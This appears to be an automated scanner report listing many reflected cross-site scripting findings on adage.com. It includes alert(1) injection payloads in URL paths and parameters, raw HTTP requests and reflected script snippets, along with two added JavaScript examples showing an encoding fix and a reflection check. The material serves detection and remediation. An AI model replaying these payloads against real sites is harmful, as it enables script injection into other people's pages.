This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad281"-alert(1)-"f7a28624ad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66b7c"-alert(1)-"2189b33e4aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22daa"-alert(1)-"f28d957d2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8f5b"-alert(1)-"4ba0874f211 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22b07"-alert(1)-"e0fa823c0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96793"-alert(1)-"a394d944e1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fd01"-alert(1)-"cbc44a735e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7b7"-alert(1)-"366d2d0d6da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cb7"-alert(1)-"a81db8a7c00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the article_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a47d"-alert(1)-"9cc0d874d9c was submitted in the article_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//CONFIGURATION VARIABLES
hbx.acct = "DM530303F9CM83EN3";
hbx.pn = "get_comments.php?article_id=2295253a47d"-alert(1)-"9cc0d874d9c";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc = "adage.com/ajax/get_comments.php"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef = "title";
hbx.ctdef = "full";
//OPTIONAL PAGE VARIABLES / ...[SNIP]...
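The remediation text above says to avoid echoing request data into a script context at all; where the inline HitBox configuration block cannot be removed, the value has to be encoded for the JavaScript string literal it lands in, not for HTML. The following is an added example, not adage.com's code and not from the scanner report: it models the hbx.pn line from the response above, reproduces the injection with the article_id payload from the finding, and shows an encoder that neutralises it. The template strings, the run() harness and the alert() stub are assumptions for the demonstration.

```javascript
// Added example; not adage.com's code and not from the scanner report. It models
// the inline HitBox configuration shown above, where request data is written
// into a double-quoted JavaScript string, and shows the fix for that context.

// Payload taken from the article_id finding above.
const CANARY = '3a47d"-alert(1)-"9cc0d874d9c';

// Vulnerable: the request value is concatenated straight into a JS string literal.
function renderVulnerable(articleId) {
  return 'var hbx = {};\n' +
    'hbx.pn = "get_comments.php?article_id=' + articleId + '";\n' +
    'hbx.mlc = "adage.com/ajax/get_comments.php";';
}

// Encoder for the JavaScript string-literal context. Every character outside
// [A-Za-z0-9] becomes \xHH or \uHHHH, which neutralises the quote breakout ("),
// the escape character (\), the HTML breakout (</script>) and the U+2028/U+2029
// line terminators. JSON.stringify alone is not enough here because it leaves
// "</script>" intact inside an inline script block.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, (ch) => {
    const cp = ch.codePointAt(0);
    const hex = cp.toString(16);
    if (cp < 0x100) return '\\x' + hex.padStart(2, '0');
    if (cp < 0x10000) return '\\u' + hex.padStart(4, '0');
    return '\\u{' + hex + '}';
  });
}

// Hardened: same template, value encoded for the context it lands in.
function renderSafe(articleId) {
  return 'var hbx = {};\n' +
    'hbx.pn = "get_comments.php?article_id=' + jsStringEscape(articleId) + '";\n' +
    'hbx.mlc = "adage.com/ajax/get_comments.php";';
}

// Runs the rendered script the way a browser would, with alert() replaced by a
// counter, and returns how many times alert fired and what hbx.pn ended up as.
function run(script) {
  let alerts = 0;
  const fakeAlert = () => { alerts += 1; };
  const pn = new Function('alert', script + '\nreturn hbx.pn;')(fakeAlert);
  return { alerts, pn };
}

console.log(run(renderVulnerable(CANARY))); // { alerts: 1, pn: NaN }
console.log(run(renderSafe(CANARY)));       // { alerts: 0, pn: 'get_comments.php?article_id=3a47d"-alert(1)-"9cc0d874d9c' }
```

In the vulnerable render the string literal is closed by the payload's first quote, alert(1) executes as an operand of the subtraction, and hbx.pn ends up NaN; in the hardened render the same bytes arrive as an ordinary string value. Encoding is the minimum fix; the alternative the remediation text points to is to keep the value out of script entirely, for example by placing it in a data attribute and having a static script read it, which removes the context problem rather than escaping around it.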
1.64. http://adage.com/ajax/get_comments.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adage.com
Path: /ajax/get_comments.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef573"-alert(1)-"863d9e39407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8361"-alert(1)-"1042b2e5d11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articled8361"-alert(1)-"1042b2e5d11/digital/doubleverify-33m-funding/229525/ HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddfeb"-alert(1)-"304ed33505d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/digital/doubleverify-33m-funding/229525ddfeb"-alert(1)-"304ed33505d/ HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.67. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adage.com
Path: /article/digital/doubleverify-33m-funding/229525/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d08c6"-alert(1)-"fa56ecc0080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/digital/doubleverify-33m-funding/229525/?d08c6"-alert(1)-"fa56ecc0080=1 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>DoubleVerify Gets Another $33M in Funding | Digital - A ...[SNIP]...
bEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";
//CONFIGURATION VARIABLES
hbx.acct = "DM530303F9CM83EN3";
hbx.pn = "article.php?d08c6"-alert(1)-"fa56ecc0080=1";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc = "adage.com/article/digital/doubleverify-33m-funding/229525/"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef = "title";
hbx.ctdef = "full";
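The findings above labelled "REST URL parameter 1" and "REST URL parameter 4" correspond to the two requests shown, where the payload is appended to the first and the fourth path segment, and the Severity High / Confidence Certain verdict rests on the canary coming back unchanged inside a <script> block, as in the HitBox snippet just shown. The following is an added example, not the scanner's code and not adage.com's, that reproduces both halves of that check offline so the same test can be rerun against a fix. The response bodies are constructed from the snippet above, and the verdict labels returned by classifyReflection are my own naming.

```javascript
// Added example; not the scanner's code and not adage.com's. It reproduces the
// check behind the "REST URL parameter N" findings: build the request path the
// way the requests above do, then classify how the canary comes back in the
// response. The response bodies below are constructed from the snippet above.

// The report numbers path segments from 1, so for
// /article/digital/doubleverify-33m-funding/229525/ parameter 1 is "article"
// and parameter 4 is "229525". The payload is appended to the segment, not
// substituted for it, which is why the requests read /articled8361"... and
// /229525ddfeb"...
function injectPathSegment(path, index, payload) {
  const parts = path.split('/'); // parts[0] is '' for the leading slash
  if (index < 1 || index >= parts.length || parts[index] === '') {
    throw new RangeError('path has no segment ' + index);
  }
  parts[index] += payload;
  return parts.join('/');
}

// Classifies a response against the canary. The scanner's payload has the form
// <prefix>"-alert(1)-"<suffix>; prefix and suffix locate the echo point, and
// the raw payload tells whether the quote survived unencoded.
function classifyReflection(body, canary) {
  const [prefix, , suffix] = canary.split('"');
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(body)) !== null) {
    if (m[1].includes(canary)) return 'unmodified-in-script'; // the report's Certain/High case
  }
  if (body.includes(canary)) return 'unmodified-outside-script';
  if (body.includes(prefix) && body.includes(suffix)) return 'modified';
  return 'not-reflected';
}

// Constructed sample responses modelled on the HitBox block above.
const CANARY = 'd08c6"-alert(1)-"fa56ecc0080';
function sampleBody(echo) {
  return '<html><head><title>DoubleVerify Gets Another $33M in Funding | Digital</title>\n' +
    '<script type="text/javascript">\n' +
    'var hbx=_hbEvent("pv");\n' +
    'hbx.pn = "article.php?' + echo + '=1";\n' +
    'hbx.mlc = "adage.com/article/digital/doubleverify-33m-funding/229525/";\n' +
    '</script></head><body></body></html>';
}
const VULNERABLE = sampleBody(CANARY);                                 // echoed verbatim
const FIXED = sampleBody('d08c6\\x22-alert(1)-\\x22fa56ecc0080');     // quote encoded as \x22
const CLEAN = sampleBody('');                                          // value not echoed

console.log(injectPathSegment('/article/digital/doubleverify-33m-funding/229525/', 4, 'ddfeb"-alert(1)-"304ed33505d'));
console.log(classifyReflection(VULNERABLE, CANARY)); // unmodified-in-script
console.log(classifyReflection(FIXED, CANARY));      // modified
console.log(classifyReflection(CLEAN, CANARY));      // not-reflected
```

A 'modified' verdict only says the raw quote did not survive; it does not prove the encoding is right for the context, so after a fix the response should still be read by hand once to confirm that the value is escaped as a JavaScript string and not merely HTML-entity encoded, which browsers do not decode inside a script block.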
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f52"-alert(1)-"5ae0a33a27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1369"-alert(1)-"9ba2570b3e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14808"-alert(1)-"d35674d75f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico14808"-alert(1)-"d35674d75f9 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: adage.com
Proxy-Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc155"-alert(1)-"1fcd7946afc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4003f"-alert(1)-"5cfe03c22a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6f08"-alert(1)-"e00607392d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54ca4"-alert(1)-"9aba41bab09 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7715a"-alert(1)-"74b81daadd4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"da314f30353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c816"-alert(1)-"25cc12a59a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f7d1"-alert(1)-"0f37756a12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fff7"-alert(1)-"3fade222f3c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18340"-alert(1)-"32365ab770 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6af"-alert(1)-"fce269f3ba2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91819"-alert(1)-"1f8001d74a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f67"-alert(1)-"555f3d15fb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c6d7"-alert(1)-"f252829a817 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd32d"-alert(1)-"b0f2a928db4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed158"-alert(1)-"e8877cf2e51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad82f"-alert(1)-"f3588c172fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54949"-alert(1)-"b7bdff866a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8074b"-alert(1)-"f96571d605a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e00f"-alert(1)-"2dd77db2802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92490"-alert(1)-"9e6d89302a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90b09"-alert(1)-"61f3cf5a7b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f93be"-alert(1)-"85b419b749b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9ad"-alert(1)-"16da5250f4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e969"-alert(1)-"260bf1a16d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3352"-alert(1)-"c3b712d34b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae52"-alert(1)-"a2d3540830b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 253e4"-alert(1)-"8f75231b492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31ca1"-alert(1)-"e9fec1e377d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9b"-alert(1)-"ea04503a836 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1bba"-alert(1)-"239b8dd9444 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aa85"-alert(1)-"2668855e0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f53d"-alert(1)-"6b94a11373c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e821e"-alert(1)-"79ddf212f2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
